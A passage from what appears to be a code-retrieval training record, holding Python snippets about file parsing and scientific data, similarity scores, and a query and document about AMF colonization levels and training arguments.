\"\\t\".join(line)\n \n if exons:\n exon_line_print(line, cds[None], 'Unknown_Transcript_' + str(unk), 'exon')\n \n if cds:\n exon_line_print(line, cds[None], 'Unknown_Transcript_' + str(unk), 'CDS')\n if not exons:\n exon_line_print(line, cds[None], 'Unknown_Transcript_' + str(unk), 'exon')\n \n unk +=1 \n\n return unk", "def _level_info(entity):\n if entity.is_max_level():\n return 'Maxed'\n if entity.max_level is not None:\n return '{entity.level}/{entity.max_level}'.format(entity=entity)\n return entity.level", "def get_vetted_sample(self):\n list_of_files = glob.glob(self.final_path)\n latest_file = max(list_of_files, key=os.path.getctime)\n df = pd.read_csv(latest_file)\n return df", "def create_tvel_file(\n depth: np.array,\n vp: np.array,\n vs: np.array,\n dens: np.array,\n save_folder: str,\n name: str = \"Test\",\n):\n\n assert (\n len(depth) == len(vp) and len(depth) == len(vs) and len(depth) == len(dens)\n ), \"All arrays (depth, vp, vs and dens) should be of same length\"\n\n \"\"\" combining all the data vector \"\"\"\n data = np.vstack((np.vstack((np.vstack((depth, vp)), vs)), dens)).T\n\n with open(join(save_folder, f\"{name}.tvel\"), \"w\") as f:\n f.write(\"# Input file for TauP\\n\")\n f.write(\"NAME TAYAK_BKE\\n\")\n for line in data:\n f.write(f\"{line[0]:8.2f}{line[1]:8.3f}{line[2]:8.3f}{line[3]:8.3f}\\n\")\n f.write(\n \"\"\" 1596.98 4.986 0.000 5.855\n 1853.05 5.150 0.000 6.025\n 2109.13 5.284 0.000 6.166\n 2365.20 5.393 0.000 6.280\n 2621.27 5.475 0.000 6.368\n 2877.35 5.534 0.000 6.430\n 3133.42 5.569 0.000 6.467\n 3389.50 5.569 0.000 6.467\"\"\"\n )\n f.close()", "def output(self):\n print(\">>>>>\\n\")\n print(self.input()[0].path)\n return GCSTarget(self.input()[0].path + '.label.csv')", "def write_tsv(labels, positions, elec_file):\n labels = labels.reshape(-1, order='F')\n positions = positions.reshape(-1, 3, order='F')\n\n elec_file = elec_file.with_suffix('.tsv')\n with elec_file.open('w') as f:\n f.write('name\\tx\\ty\\tz\\n')\n for i in range(labels.shape[0]):\n f.write(f'{labels[i]}\\t{positions[i, 0]:.3f}\\t{positions[i, 1]:.3f}\\t{positions[i, 2]:.3f}\\n')", "def open_trajectory(basename):\n if os.path.isfile(basename + '.trr'):\n print \"Detected GROMACS trajectory\"\n return gromacs.Trajectory(basename)\n if os.path.isfile(basename + '.psf'):\n print \"Detected NAMD trajectory\"\n return namd.Trajectory(basename)\n if os.path.isfile(basename + '.top'):\n print \"Detected AMBER trajectory\"\n return amber.Trajectory(basename)\n raise ValueError(\"No trajectories found at all!\")", "def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def get_traces(self):\n\n self.rank = 0\n traces = []\n sub_traces = []\n current = []\n with open(self.file_path, 'r') as f:\n for line in f:\n current.append(line.strip('\\n').replace('<', '\\<').replace('>', '\\>'))\n sub_traces.append(current)\n traces.append(sub_traces)\n return traces", "def gread(cls, file, sextractor=False, format=None):\n import astropy.units as u\n \n if format is None: \n if sextractor:\n format = 'ascii.sextractor'\n else: \n if file.endswith('.fits'):\n format='fits'\n elif file.endswith('.csv'):\n format = 'csv'\n else:\n format = 'ascii.commented_header'\n \n #print(file, format) \n tab = cls.read(file, format=format)\n \n return tab", "def extract_ver_lab_anno(gt_file):\n vertices = []\n labels = []\n annotations = []\n with open(gt_file, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().rstrip('\\n').lstrip('\\ufeff').strip().split(',', maxsplit=8)\n vertices.append(list([int(ver) for ver in line[:8]]))\n annotations.append(str(line[-1]).strip())\n if str(line[-1]).strip() == \"\" or str(line[-1]).strip() is None or len(str(line[-1]).strip()) < 1:\n labels.append(0)\n else:\n labels.append(1)\n\n return np.array(vertices), np.array(labels), np.array(annotations)" ]
[ "0.5939053", "0.5729971", "0.54536223", "0.51073116", "0.5047787", "0.5043582", "0.50271034", "0.5015402", "0.48891845", "0.48566693", "0.48362452", "0.48115683", "0.4806834", "0.4803698", "0.48016763", "0.47835353", "0.47271547", "0.47254357", "0.47245374", "0.47214988", "0.46874157", "0.46772584", "0.46699622", "0.46611837", "0.4651956", "0.46019983", "0.45954007", "0.45713425", "0.45518386", "0.45490912", "0.45485348", "0.45376378", "0.45313516", "0.44896996", "0.44761717", "0.44668922", "0.44664097", "0.4455608", "0.4446775", "0.44218254", "0.4421819", "0.4414594", "0.44113186", "0.44103092", "0.44083104", "0.4402147", "0.43950897", "0.4390959", "0.43861407", "0.43791932", "0.43791187", "0.4378119", "0.43762192", "0.43736315", "0.43681407", "0.43667012", "0.43648407", "0.43582428", "0.43556207", "0.4354956", "0.43542072", "0.43502", "0.43486828", "0.43485337", "0.43422386", "0.43381086", "0.43377814", "0.4330142", "0.43296298", "0.43260092", "0.43243438", "0.4324302", "0.43218195", "0.43214694", "0.43147564", "0.4313136", "0.4312467", "0.43089533", "0.4307697", "0.4307362", "0.43004474", "0.4291125", "0.42907646", "0.42809418", "0.42782474", "0.4275567", "0.42731687", "0.4272167", "0.42707175", "0.426916", "0.4264842", "0.4264756", "0.42578074", "0.42572916", "0.4255483", "0.42504385", "0.42488882", "0.4246877", "0.42396438", "0.42387766" ]
0.6666001
0
Indicate whether the current level is level 1 (colonization).
def colonization(): return get('level') == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_single_level(self):\n return self.fragments_tree.height <= 2", "def is_flat(self):\n if self.master:\n return self.master.is_flat\n\n return len(self.levels) == 1", "def is_top_level(self) -> bool:\n return self._indent == ''", "def top_left_dot(self) -> bool:\n return bool(self._getindicator(1))", "def master(self):\n return self.depth == 0", "def unnecessary_colon(self):\n if self.line.endswith(':'):\n return True", "def first_level_text_is_displayed(self):\n first_level_text = self.driver.find_element_by_name(self.FIRST_LEVEL_TEXT_NAME)\n return first_level_text.is_displayed()", "def is_multi_level(self):\n return self.is_flag_set(StatefulParser.FLAGS.MULTI_LEVEL)", "def is_1DNN(self):\n if not self.dims == 1:\n return False\n if not set(self.__m__.keys()) <= set(((0,),(1,),(-1,))):\n return False\n\n return True", "def node_leaf(self):\r\n return self.zero_son is None and self.one_son is None", "def has_leaf(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"has_leaf\"))\r\n return self._hvac_mode == \"eco\"", "def isSetInitialLevel(self):\n return _libsbml.QualitativeSpecies_isSetInitialLevel(self)", "def isAutoLevel(self):\n return self.getAutoLevelFunction() is not None", "def path_is_base(self, path):\n\n return path is not None and len(path) == len(self.levels)", "def is_core(self):\n #core_stems = (\n # 'Algebra','Geometry','Precalculus','Calculus',\n # 'Biology','Chemistry','Physics','Living Environment','Global Environment','Scientific Literacy',\n # 'History','Economics',\n # 'Literature','Language','Writing','AP','Sem',\n # 'Korean',\n # )\n #core = False\n #for stem in core_stems:\n # if stem in self.title:\n # core = True\n \n return self.level>0", "def is_up(self):\n \n return self.is_level('up')", "def is_leaf(self) -> bool:\n return self.data_bytes[0] == ProofPath._KeyPrefix.LEAF", "def is_lattice(self):\n return hasattr(self,\"uc\") and len(self.maximals())==1 and type(self.get_meet())!=str and type(self.get_join())!=str", "def is_diagonal(self):\n return self.is_upper() and self.is_lower()", "def not_known_depth_header(pair):\n _, parent = pair\n return (not parent.title or\n not title_label_pair(\n parent.title, self.appendix_letter, self.part))", "def bottom_left_dot(self) -> bool:\n return bool(self._getindicator(2))", "def is_root(self):\n return self.root in [-1, self]", "def is_leaf(self):\n return len(self.blocks) == 0", "def is_leaf(self):\r\n return self.num_children() == 0", "def tree_has_single_path(self, node):\n num_children = len(node.children)\n if num_children > 1:\n return False\n elif num_children == 0:\n return True\n else:\n return True and self.tree_has_single_path(node.children[0])", "def is_root(self):\n return self.parent == None", "def is_root(self):\n return self.parent_id is None", "def is_leaf(self):\n return len(self.child_list) == 0", "def is_root(self):\n return \"/\" == self.h5_path", "def has_parent_key(self):\n if self.is_root():\n return False\n try:\n self.parent_key()\n return True\n except ParseException:\n return False", "def is_root(self) -> bool:\n return self.parent_id is None", "def is_leaf(self):\n if len(self.children) == 0:\n return True\n else:\n return False", "def is_diagonal(self):\n return self.rep.is_diagonal()", "def leaf(self):\n if not self._leftchild and not self._rightchild:\n return True\n return False", "def is_simple(self):\n return self.upper_binary_tree() == self.lower_binary_tree()", "def leaf(self):\n if not self.left and not self.right:\n return True\n return False", "def is_leaf(self):\n return len(self.children) == 0", "def is_leaf(self):\n return self.pixel_count > 0", "def is_leaf(self):\n return self.__left == None and self.__right==None", "def is_on(self, level):\n\n return self.log_level >= level", "def is_leaf(self):\n return self._children == {}", "def is_leaf(self):\n return self._children == {}", "def is_leaf(self):\n return self._children == {}", "def is_leaf(self):\n return self._children == {}", "def isLeaf(self):\n return self.left is None and self.right is None", "def es_hoja(self) -> bool:\n return len(self.children) == 0", "def IsRoot(self):\n return not self._parent_group", "def is leaf(self, p):\n return self.num children(p) == 0", "def is_root(self):\n return self._parent == None", "def _is_label(self) -> bool:\n return self.lines[self.counter].startswith(\"(\") and self.lines[\n self.counter\n ].endswith(\")\")", "def has_connection_left(tile):\n return is_kth_bit_set(tile, 1)", "def is_stack(self) -> bool:\n return self.layers > 1", "def _is_start(self, line):\n if re.match(\".*\\:\\s*\\(groupid\", line):\n return True", "def is_root(self):\n return not self.parent", "def is_left_coset(self):\n return str(self._dir) == '-'", "def is_last(self, level):\n\n return level == self.levels[-1]", "def isNest(self):\n\t\tif self.nestInfo == None:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def is_root(self):\n return True", "def is_root(self):\n return True", "def is_leader(self):\n return self.__is_leader", "def is_internal(self):\n if self.is_leaf() or self.is_semileaf():\n return False\n return True", "def isLeaf(self):\n\n return self.children == {}", "def is_connected(self):\n connected = False\n self.state = self.mesh.state()\n if self.state in (STATE_CHILD, STATE_ROUTER, STATE_LEADER, STATE_LEADER_SINGLE):\n connected = True\n return connected", "def direct(self):\n return self.isleaf and not self.isExtended", "def is_cluster_leader(self):\n return self.leader == 'self'", "def is_2d(self) -> bool:\n return self.layers == 1 and self.times == 1", "def is_leaf(self):\n return len(self._children) == 0", "def showSeparator():\n\treturn (1, 0)", "def hasMid(self):\n\t\treturn self.toMid().exists", "def _is_left(self):\n if self.parent is None:\n return None\n else:\n return self is self.parent.left", "def is_parent_of(self):\n return self.hasLabel('parent_of')", "def islchild(self):\n\t\tif (self.parent() and self.parent().lchild() is self): #TODO is or == here\n\t\t\treturn True\n\t\treturn False", "def final_level_text_is_displayed(self):\n final_level_text = self.driver.find_element_by_name(self.FINAL_LEVEL_TEXT_NAME)\n return final_level_text.is_displayed()", "def _isLine(self):\n return (self.width == 0 and self.height > 1) or (self.height == 0 and self.width > 1)", "def _isLine(self):\n return (self.width == 0 and self.height > 1) or (self.height == 0 and self.width > 1)", "def is_subgroup(self, right):\n if right.level() == 1:\n return True\n if is_Gamma0(right):\n return self.level() % right.level() == 0\n if is_Gamma1(right):\n if right.level() >= 3:\n return False\n elif right.level() == 2:\n return self.level() == 2\n # case level 1 dealt with above\n else:\n return GammaH_class.is_subgroup(self, right)", "def intra_struct():\n\n return get('level') == 2", "def initial_level(self):\n return self.get(self._names[\"initial_level\"])", "def is_depth(self):\n return self._is_depth", "def is_leaf(self):\n if self._leftchild or self._rightchild:\n return False\n return True", "def complete_level(self):\n if self.ycor() == self.finish_line:\n return True", "def internal(self):\n if self._leftchild or self._rightchild:\n return True\n return False", "def isfixline(number):\n if number[0] == '(':\n return True\n return False", "def isLeaf(self) -> bool:\n return not self.left and not self.right", "def IsTopLevelTest(self):\n return ((not self.IsGroup()) and\n self.parent and\n (self.parent == self.root or self.parent.IsGroup()))", "def is_line(self):\n return True", "def is_line(self):\n return True", "def isInit(this):\n\t\treturn not not this._CAP\n\t\t# Who's here ?\n\t\t# - Me, I kill you.", "def is_start_node():\n return False", "def is_first_collation(self, collation):\n return collation.header.parent_collation_hash == self.env.config['GENESIS_PREVHASH']", "def collapsed(blk):\n if blk is not None and blk.name in COLLAPSIBLE and\\\n len(blk.values) == 1 and blk.values[0] != 0:\n return True\n return False", "def is_root(self):\n return self.comment is None", "def is_cont_node():\n return False", "def is_simple_in_opt(self) -> bool:\n return self.inner_part_of_optional.is_simple", "def has_parent(self):\n return self.parent != None", "def isDiagonal(self):\n raise Exception('Deprecated')\n return self.direction % 2 == 1", "def __nonzero__(self):\n # XXX: check the name and the characterID?\n if self.data.get('name'): return 1\n return 0", "def isFirst(self):\n index = self.parentNode.idevices.index(self)\n return index == 0", "def what_level(index):\n if index == [1,1] or [1,2]:\n level = 1\n else:\n level = 0\n return level", "def is_leaf(self):\n return isinstance(self, Leaf)" ]
[ "0.6308522", "0.60663605", "0.592682", "0.57595533", "0.5757749", "0.56357706", "0.56121695", "0.55404365", "0.5528773", "0.55099", "0.55035543", "0.54934734", "0.5432446", "0.5344056", "0.53366804", "0.53177035", "0.5317035", "0.5309982", "0.52847475", "0.52829605", "0.52761316", "0.5269463", "0.5268106", "0.5261028", "0.5255746", "0.5245973", "0.52141136", "0.5199503", "0.51957625", "0.5194776", "0.5190197", "0.51898795", "0.5188589", "0.51750946", "0.5171196", "0.51533145", "0.51454884", "0.5136007", "0.5132644", "0.51324815", "0.5122685", "0.5122685", "0.5122685", "0.5122685", "0.5115832", "0.5114884", "0.51140773", "0.5111661", "0.51078373", "0.51009023", "0.5081631", "0.50793344", "0.5077668", "0.50660366", "0.50638485", "0.5047929", "0.5040562", "0.50386155", "0.50386155", "0.50379765", "0.50356144", "0.502788", "0.5019262", "0.50065494", "0.5004008", "0.50026447", "0.5002097", "0.49955693", "0.49948516", "0.4990291", "0.4974735", "0.4974504", "0.4965114", "0.4963792", "0.4963792", "0.4952702", "0.49525794", "0.49476185", "0.49329332", "0.49287364", "0.49150842", "0.49143058", "0.49098343", "0.49045828", "0.49023336", "0.48722112", "0.48722112", "0.48709762", "0.4866956", "0.48643386", "0.48636824", "0.4863242", "0.48629224", "0.48616445", "0.4860962", "0.48606965", "0.48585245", "0.48501325", "0.48378235", "0.48331434" ]
0.7897029
0
Indicate whether the current level is level 2 (AM fungal structures).
def intra_struct(): return get('level') == 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_subgroup(self, right):\n if right.level() == 1:\n return True\n if is_Gamma0(right):\n return self.level() % right.level() == 0\n if is_Gamma1(right):\n if right.level() >= 3:\n return False\n elif right.level() == 2:\n return self.level() == 2\n # case level 1 dealt with above\n else:\n return GammaH_class.is_subgroup(self, right)", "def is_single_level(self):\n return self.fragments_tree.height <= 2", "def is_multi_level(self):\n return self.is_flag_set(StatefulParser.FLAGS.MULTI_LEVEL)", "def is_2d(self) -> bool:\n return self.layers == 1 and self.times == 1", "def _contains_sl2(self, a,b,c,d):\n return (c % self.level() == 0)", "def even(self):\n return self._ % 2 == 0", "def has_2D(self):\n\t\tif self.have_fastas is False:\n\t\t\tself._extract_fastas_from_fast5()\n\t\t\tself.have_fastas = True\n\n\t\tif self.fastas.get('twodirections') is not None:\n\t\t\treturn True\n\t\treturn False", "def cat_l2_supported():\n return common.CAT_L2_CAP in SYSTEM_CAPS", "def colonization():\n\n return get('level') == 1", "def has_action2(self, feature):\n return feature in self._action2", "def check_lighting_state_room2():\n if timer_lights_on_off_room2() == room2_lux():\n pass\n else:\n light_room2(timer_lights_on_off_room1())", "def level(self):\n return self.init_v[2]", "def is_depth(self):\n return self._is_depth", "def isSecond(self):\n return _libsbml.Unit_isSecond(self)", "def test_build19_level2_additions():\n f = Level2File(get_test_data('Level2_KDDC_20200823_204121.ar2v'))\n assert f.vcp_info.vcp_version == 1\n assert f.sweeps[0][0].header.az_spacing == 0.5", "def hasTwoSons(self):\n \n return self._leftSon is not None and self._rightSon is not None", "def isSetBindingSite2(self):\n return _libsbml.InSpeciesTypeBond_isSetBindingSite2(self)", "def checkL3v2Compatibility(self):\n return _libsbml.SBMLDocument_checkL3v2Compatibility(self)", "def level_unlocked(self) -> bool:\r\n return self.player_profile.is_level_unlocked(self.level_num)", "def requires_2sa(self):\n return (\n self.data.get(\"hsaChallengeRequired\", False)\n and self.data[\"dsInfo\"].get(\"hsaVersion\", 0) >= 1\n )\n # FIXME: Implement 2FA for hsaVersion == 2 # pylint: disable=fixme", "def isAutoLevel(self):\n return self.getAutoLevelFunction() is not None", "def is_even(self):\n return True", "def is_crossing_len2(self, gp: GriddedPerm) -> bool:\n return (\n len(gp) == 2\n and gp.occupies(self.first_cell)\n and gp.occupies(self.second_cell)\n )", "def is_level(self, state):\n \n logging.info('checking state '+state+' against self '+str(self.state))\n result = False\n if('up' == state):\n result = (self.state == 255)\n elif('down' == state):\n result = (self.state == 0)\n elif(state.isdigit()):\n state = int(state)\n result = (abs(self.state - int(255*state/100)) < 2)\n return result", "def has_other_half(self) -> bool:\n return self.layout in (\n \"flip\",\n \"split\",\n \"transform\",\n \"meld\",\n \"aftermath\",\n \"adventure\",\n \"modal_dfc\",\n )", "def has_stereo(gra):\n return bool(atom_stereo_keys(gra) or bond_stereo_keys(gra))", "def check_version_2(dataset):\n\n if float(dataset.get('version')) >= 2.0 \\\n if dataset.get('version') else False:\n return True\n else:\n return False", "def is_i2s_enabled(self):\n return ((self.get_control() & CONTROL_ENABLE) > 0)", "def isPower2(num):\n\treturn ((num & (num - 1)) == 0) and num > 0", "def isPower2(num):\n\treturn ((num & (num - 1)) == 0) and num > 0", "def isNest(self):\n\t\tif self.nestInfo == None:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def is_on(self, level):\n\n return self.log_level >= level", "def sd_2_non_negative_rule(_m):\r\n\r\n return m.sd_2 >= 0", "def checkL2v2Compatibility(self, inConversion=False):\n return _libsbml.SBMLDocument_checkL2v2Compatibility(self, inConversion)", "def is_down(self):\n \n return self.is_level('down')", "def is_flat(self):\n if self.master:\n return self.master.is_flat\n\n return len(self.levels) == 1", "def _get_static_level2(self):\n return self.__static_level2", "def has_crossing_len2_ob(self) -> bool:\n fcell = self.first_cell\n scell = self.second_cell\n if self._fuse_row:\n possible_obs = [\n GriddedPerm((0, 1), (fcell, scell)),\n GriddedPerm((1, 0), (scell, fcell)),\n ]\n else:\n possible_obs = [\n GriddedPerm((0, 1), (fcell, scell)),\n GriddedPerm((1, 0), (fcell, scell)),\n ]\n return any(ob in possible_obs for ob in self._tiling.obstructions)", "def is_top_level(self) -> bool:\n return self._indent == ''", "def _deeper_level(first, second):\n for level1 in p_level_of(first):\n for level2 in p_level_of(second):\n if level1 < level2:\n return True\n return False", "def __gt__(self,f2):\n return self.__num * f2.den > self.__den * f2.num", "def feature_two(ds, tup):\n # try:\n # if (nx.shortest_path_length(G, frm, to) == 2):\n # o2.write(\"trusted\\n\")\n # else:\n # o2.write(\"unverified\\n\")\n # except:\n # o2.write(\"unverified\\n\")\n\n A_child = ds[tup[0]]\n C_child = ds[tup[1]]\n return ((len(A_child.intersection(C_child)) > 0) | (tup[0] in ds[tup[1]]))", "def is_simple(self):\n return self.upper_binary_tree() == self.lower_binary_tree()", "def test_level2(fname, voltime, num_sweeps, mom_first, mom_last, expected_logs, caplog):\n caplog.set_level(logging.WARNING, 'metpy.io.nexrad')\n f = Level2File(get_test_data(fname, as_file_obj=False))\n assert f.dt == voltime\n assert len(f.sweeps) == num_sweeps\n assert len(f.sweeps[0][0][-1]) == mom_first\n assert len(f.sweeps[-1][0][-1]) == mom_last\n assert len(caplog.records) == expected_logs", "def is_compatible(self, e2):\n\n return (self.type == TypeEdge.HOLE and e2.type == TypeEdge.HEAD) or (self.type == TypeEdge.HEAD and e2.type == TypeEdge.HOLE) \\\n or self.type == TypeEdge.UNDEFINED or e2.type == TypeEdge.UNDEFINED", "def __isFarFromLevel(self, l):\n\n s = np.mean(self.df['high'] - self.df['low'])\n return np.sum([abs(l-x) < s for x in self.levels]) == 0", "def __eq__(self, other: Level) -> bool:\n if isinstance(other, Level):\n return str(self) == str(other)\n if isinstance(other, LevelOfTheory):\n if self.method == other.method and self.basis == other.basis:\n return True\n return False", "def hasBzip2():\n return _libsbml.SBMLReader_hasBzip2()", "def isActive(self):\n return self.sides[0].isActive() and self.sides[1].isActive()", "def isSpo2(obxDict):\n readingCode = getReadingCode(obxDict)\n return readingCode == '2710-2'", "def is_stack(self) -> bool:\n return self.layers > 1", "def is_internal(self):\n if self.is_leaf() or self.is_semileaf():\n return False\n return True", "def event_m20_11_x27(z104=20111500, mode2=1, goods3=60536000):\n \"\"\"State 0,1: Judgment to examine\"\"\"\n IsObjSearched(0, z104)\n assert ConditionGroup(0)\n \"\"\"State 2: Available branch\"\"\"\n # goods:60536000:Pharros' Lockstone\n if (ItemCount(goods3, 1, 1, 0) > mode2) != 0:\n \"\"\"State 3: Available end\"\"\"\n return 0\n else:\n \"\"\"State 4: Unusable termination\"\"\"\n return 1", "def GetNarrowBanding(self) -> \"bool\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF2_GetNarrowBanding(self)", "def canSee(self, p1, p2):\n\n\t\t# lift two points a bit above the grouond to prevent the\n\t\t# collision ray from hitting the edge of shallow terrain;\n\t\t# also, put them at different level so that the ray has\n\t\t# nonzero length (a requirement for collisionSegment()).\n\t\tp1[2] += 1\n\t\tp2[2] += 0.9\n\t\tself.auxCSNp.node().modifySolid(self.auxCSSolid).setPointA(p1)\n\t\tself.auxCSNp.node().modifySolid(self.auxCSSolid).setPointB(p2)\n\t\n\t\tself.csTrav.traverse(render)\n\t\n\t\treturn (self.csHandler.getNumEntries() == 0)", "def has_twopair(self):\n count = 0\n self.suit_hist()\n for val in self.ranks.values():\n if val == 2:\n count += 1\n if count >= 2:\n self.rank_per_hand['1'] = \"two pair\"\n return True\n return False", "def hasBzip2():\n return _libsbml.SBMLWriter_hasBzip2()", "def isOpen(self):\n\t\treturn not self.endgame", "def is_last(self, level):\n\n return level == self.levels[-1]", "def is_semileaf(self):\n if self._leftchild and self._rightchild:\n return False\n if not self._leftchild and not self._rightchild:\n return False\n return True", "def is_version_2_6() -> bool:\n v = get_version()\n if v[1] != \"singularity\" and v[1] != \"singularity-ce\":\n return False\n return v[0][0] == 2 and v[0][1] == 6", "def is_core(self):\n #core_stems = (\n # 'Algebra','Geometry','Precalculus','Calculus',\n # 'Biology','Chemistry','Physics','Living Environment','Global Environment','Scientific Literacy',\n # 'History','Economics',\n # 'Literature','Language','Writing','AP','Sem',\n # 'Korean',\n # )\n #core = False\n #for stem in core_stems:\n # if stem in self.title:\n # core = True\n \n return self.level>0", "def is_even(self):\n pass", "def stale_info_type_2(self):\n config_values = self.config.values()\n bot_exists = constants.BOTTOM in config_values\n empty_exists = [] in config_values\n if bot_exists or empty_exists:\n logger.debug(f\"Stale info (type 2) found! Current config: {self.config}\")\n return bot_exists or empty_exists", "def is_team(self):\n return self.hasLabel('Team')", "def __bool__(self):\n return _osgAnimation.vectorVec2Keyframe___bool__(self)", "def is_route_throu(self):\n\n # VPR stores route-through LUTs as \"open\" blocks with mode set to\n # \"wire\".\n return self.is_leaf and self.name == \"open\" and self.mode == \"wire\"", "def compare(self, t2) -> bool:\n return True if self.get_edge(t2) >= 0 else False", "def checkL2v4Compatibility(self):\n return _libsbml.SBMLDocument_checkL2v4Compatibility(self)", "def _is_ue3(self):\n\n return False", "def _is_service_catalog_v2(catalog):\n return type(catalog) is sc.ServiceCatalogV2", "def get_structure2(self):\n return self.atom2.fragment.chain.model.structure", "def what_level(index):\n if index == [1,1] or [1,2]:\n level = 1\n else:\n level = 0\n return level", "def __ge__(self,f2):\n return self > f2 or self == f2", "def test_G_2_by_2_2tailed_equal(self):\r\n self.assertFloatEqual(0, G_2_by_2(1, 1, 1, 1, False, False)[0])\r\n self.assertFloatEqual(0, G_2_by_2(100, 100, 100, 100, False, False)[0])\r\n self.assertFloatEqual(0, G_2_by_2(100, 100, 100, 100, True, False)[0])", "def is_block(self):\n\t\treturn self.name in get_elements_collection(self.__res, 'block_level')", "def isPlayed(self):\n return bool(self.viewedLeafCount == self.leafCount)", "def isPlayed(self):\n return bool(self.viewedLeafCount == self.leafCount)", "def update2_trace(self):\r\n tmp = [row.copy() for row in self.grid]\r\n changed = False\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n if self.grid[y][x] == '#' and sum(self.is_occupied(p) for p in self.neighbours[(x, y)]) >= 5:\r\n tmp[y][x] = 'L'\r\n changed = True\r\n elif self.grid[y][x] == 'L' and self.is_available2_trace(x, y):\r\n tmp[y][x] = '#'\r\n changed = True\r\n self.grid = tmp\r\n return changed", "def is_team(self):\n return self._tag == 'team'", "def is_root(self):\n return self.unpack_word(0x2) & 0x0004 > 0", "def maximum_level(self, question_type):\n\t\treturn 2", "def has_leaf(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"has_leaf\"))\r\n return self._hvac_mode == \"eco\"", "def is_structure(self) -> bool:\n return ATTRIBUTE.Structure.value in self.type_data.attributes", "def is_structure(self) -> bool:\n return ATTRIBUTE.Structure.value in self.type_data.attributes", "def _Schoof_mod2(self):\n if not self.b:\n result = 0\n _log.debug(\"(%d, 2) #\" % result)\n else:\n linearfactors = UniVarPolynomial({card(self.basefield):self.basefield.one, 1:-self.basefield.one}, self.basefield)\n if GCD(self.cubic, linearfactors).degree() == 0:\n result = 1\n _log.debug(\"(%d, 2) ##\" % result)\n else:\n result = 0\n _log.debug(\"(%d, 2) ###\" % result)\n return (result, 2)", "def is_FSAL(self):\n if np.all(self.A[-1,:]==self.b): return True\n else: return False", "def is_closed(self) -> bool | None:\n if self.data.levelpercentage is None:\n return None\n return self.data.levelpercentage == 100 # type: ignore [no-any-return]", "def SBMLReader_hasBzip2():\n return _libsbml.SBMLReader_hasBzip2()", "def is_homolog(self, segment2):\n hdict = {}\n\n for fragment in self.fragment_list:\n hdict[fragment.fragment_id] = fragment.res_name\n\n for fragment in segment2.fragment_list:\n if hdict.get(fragment.fragment_id, fragment.res_name) != fragment.res_name:\n return False\n\n return True", "def blanc(self):\n if self.__valeur1 == 0:\n return True\n if self.__valeur2 == 0:\n return True\n else:\n return False", "def is_terminal_state(self):\r\n return (self.course[self.position[0],\r\n self.position[1]] == 2)", "def depth_check(self, depth):\r\n if depth >= self.ply:\r\n return True\r\n return False", "def at(self) -> bool:\n\n return 'step_active' in self.__get_step_2_div().get_attribute(\"class\")", "def __gt__(self, hand2):\n # TODO: Implement\n if self.type > hand2.type:\n return True\n elif self.type < hand2.type:\n return False\n elif self.type == hand2.type:\n # NOTE: This ignores the case in which both hands have the same type\n # and rank. I think this is okay for now.\n return self.rank > hand2.rank", "def is_up(self):\n \n return self.is_level('up')", "def DualMode(self) -> bool:", "def __le__(self,f2):\n return not self > f2 or self == f2", "def isLevelMaxReached(self) :\n if self.id_level == len(self.list_level) - 1:\n return True\n return False", "def block2_threshold(self):\n return self._safe_value(VAR_BLOCK2THRESHOLD, float)" ]
[ "0.6321547", "0.62854135", "0.62632716", "0.6087753", "0.59138495", "0.5752362", "0.5700526", "0.56212634", "0.55640566", "0.55273724", "0.5408885", "0.5408016", "0.53746355", "0.53725296", "0.5317222", "0.5312037", "0.5294672", "0.52933645", "0.52883124", "0.5273141", "0.5252779", "0.5240626", "0.5239407", "0.5237722", "0.5227749", "0.52274907", "0.5226634", "0.52169967", "0.5210894", "0.5210894", "0.52035207", "0.52022356", "0.5183489", "0.5182178", "0.5180906", "0.5175882", "0.51693857", "0.51608545", "0.5137518", "0.51346475", "0.51339436", "0.51303494", "0.51273733", "0.5127251", "0.5120428", "0.51196486", "0.5109459", "0.5046618", "0.50427914", "0.50384223", "0.50342584", "0.50272715", "0.50236577", "0.5014213", "0.5000598", "0.5000383", "0.49946922", "0.49887392", "0.4979942", "0.49687317", "0.4958143", "0.4942256", "0.49410197", "0.4937454", "0.49348846", "0.49346724", "0.49344566", "0.49249747", "0.49010822", "0.49007517", "0.4899755", "0.489278", "0.4889378", "0.48892704", "0.4881674", "0.48812944", "0.48681223", "0.48681223", "0.48640513", "0.48598954", "0.48553443", "0.48527882", "0.48491052", "0.48448908", "0.48448908", "0.48447302", "0.48415783", "0.48338205", "0.48327556", "0.48299742", "0.48286736", "0.48269773", "0.48251513", "0.4825021", "0.48148897", "0.4804797", "0.4798151", "0.4797401", "0.47947484", "0.47943264" ]
0.66111106
0
Defines arguments used in training mode.
def training_subparser(subparsers): parser = subparsers.add_parser('train', help='learns how to identify AMF structures.', formatter_class=RawTextHelpFormatter) x = PAR['batch_size'] parser.add_argument('-b', '--batch_size', action='store', dest='batch_size', metavar='NUM', type=int, default=x, help='training batch size.' '\ndefault value: {}'.format(x)) x = PAR['drop'] parser.add_argument('-k', '--keep_background', action='store_false', dest='drop', default=x, help='keep all background tiles.' '\nby default, downscale background to equilibrate classes.') x = PAR['data_augm'] parser.add_argument('-a', '--data_augmentation', action='store_true', dest='data_augm', default=x, help='apply data augmentation (hue, chroma, saturation, etc.)' '\nby default, data augmentation is not used.') x = PAR['save_augmented_tiles'] parser.add_argument('-sa', '--save_augmented_tiles', action='store', dest='save_augmented_tiles', metavar='NUM', type=int, default=x, help='save a subset of augmented tiles.' '\nby default, does not save any tile.') x = PAR['summary'] parser.add_argument('-s', '--summary', action='store_true', dest='summary', default=x, help='save 